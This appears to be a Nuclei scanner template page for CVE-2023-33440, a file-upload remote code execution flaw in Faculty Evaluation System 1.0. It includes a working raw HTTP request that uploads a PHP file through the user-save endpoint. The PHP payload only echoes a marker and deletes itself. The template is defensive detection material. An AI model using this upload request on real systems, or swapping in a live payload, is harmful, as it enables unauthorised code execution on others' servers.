Faculty Evaluation System v1.0 - Remote Code Execution

ID: CVE-2023-33440

Severity: high

Author: Harsh

Tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project

Description

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.

YAML Source

id: CVE-2023-33440

info:
  name: Faculty Evaluation System v1.0 - Remote Code Execution
  author: Harsh
  severity: high
  description: |
    Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/172672/Faculty-Evaluation-System-1.0-Shell-Upload.html
    - https://github.com/F14me7wq/bug_report/blob/main/vendors/oretnom23/faculty-evaluation-system/RCE-1.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-333440
    - https://github.com/1337kid/Exploits
    - https://github.com/Alexander-Gan/Exploits
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-33440
    cwe-id: CWE-434
    epss-score: 0.07644
    epss-percentile: 0.94146
    cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: faculty_evaluation_system_project
    product: faculty_evaluation_system
  tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project
variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  string: "CVE-2023-33440"

http:
  - raw:
      - |
        POST /ajax.php?action=save_user HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------1037163726497

        -----------------------------1037163726497
        Content-Disposition: form-data; name="id"

        1
        -----------------------------1037163726497
        Content-Disposition: form-data; name="firstname"

        Administrator
        -----------------------------1037163726497
        Content-Disposition: form-data; name="lastname"

        a
        -----------------------------1037163726497
        Content-Disposition: form-data; name="img"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        -----------------------------1037163726497
        Content-Disposition: form-data; name="email"

        {{email}}
        -----------------------------1037163726497
        Content-Disposition: form-data; name="password"


        -----------------------------1037163726497
        Content-Disposition: form-data; name="cpass"


        -----------------------------1037163726497--
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'regex("^1$", body_1)'
          - '!regex("^2$", body_1)'
          - 'len(body_1) == 1'
          - 'contains(body_2, "Faculty Evaluation")'
        condition: and
# digest: 4a0a00473045022100d41edc627f975e79d02d25ab549f34c63d424b783b867a575376d66963f7bdb102200b9a2172e907be885bf4351c1314a44396cf51ddb67732eef6be946c5405adfa:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-33440.yaml"

View on Github